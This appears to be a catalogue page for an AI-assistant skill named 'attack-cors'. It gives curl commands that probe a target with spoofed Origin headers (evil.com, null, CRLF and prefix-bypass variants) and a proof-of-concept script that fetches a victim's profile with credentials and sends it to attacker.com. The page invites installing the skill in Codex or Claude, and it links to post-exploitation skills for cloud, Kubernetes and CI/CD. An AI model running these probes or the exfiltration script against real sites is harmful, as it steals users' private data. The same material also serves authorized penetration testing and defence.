메뉴
CORS misconfiguration testing — origin reflection, wildcard bypass, null origin, credential leakage
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
SOC 직업 분류 기준
| name | attack-cors |
| description | CORS misconfiguration testing — origin reflection, wildcard bypass, null origin, credential leakage |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["cors","web","owasp","access-control","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-942","CWE-346"] |
| chains_with | ["attack-open-redirect","attack-idor-automation"] |
| prerequisites | [] |
| severity_boost | {"attack-open-redirect":"CORS + open redirect = token theft via cross-origin request"} |
Identify Cross-Origin Resource Sharing misconfigurations that allow unauthorized cross-origin access to sensitive data or APIs.
Test if the server reflects arbitrary origins in Access-Control-Allow-Origin:
# Automated CORS checker (bundled script)
attack_script cors_checker https://TARGET/api/endpoint --json-output
Manual tests:
# Arbitrary origin
curl -s -H "Origin: https://evil.com" TARGET_URL -D- | grep -i "access-control"
# Subdomain bypass
curl -s -H "Origin: https://TARGET.evil.com" TARGET_URL -D-
# Null origin
curl -s -H "Origin: null" TARGET_URL -D-
# HTTP downgrade
curl -s -H "Origin: http://TARGET" TARGET_URL -D-
# Backtick bypass
curl -s -H "Origin: https://TARGET%60.evil.com" TARGET_URL -D-
# Underscore bypass
curl -s -H "Origin: https://TARGET_.evil.com" TARGET_URL -D-
# CRLF injection
curl -s -H "Origin: https://evil.com%0d%0a" TARGET_URL -D-
# Prefix matching bypass
curl -s -H "Origin: https://evil-TARGET" TARGET_URL -D-
If ACAO reflects attacker origin + ACAC is true:
<!-- PoC: reads victim data cross-origin -->
<script>
fetch('https://TARGET/api/user/profile', {
credentials: 'include'
})
.then(r => r.json())
.then(d => fetch('https://attacker.com/log?data=' + btoa(JSON.stringify(d))))
</script>
| Condition | Severity |
|---|---|
| Arbitrary origin reflected + credentials allowed | Critical (P1) |
| Arbitrary origin reflected, no credentials | Medium (P3) |
| null origin accepted + credentials allowed | High (P2) |
| Subdomain origin reflected + credentials | High (P2) |
| Wildcard ACAO with credentials | Medium (P3) |
Origin headerAccess-Control-Allow-Origin reflectionAccess-Control-Allow-Credentials: trueattack_script cors_checker — automated multi-origin testingcurl — manual header injectioneBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools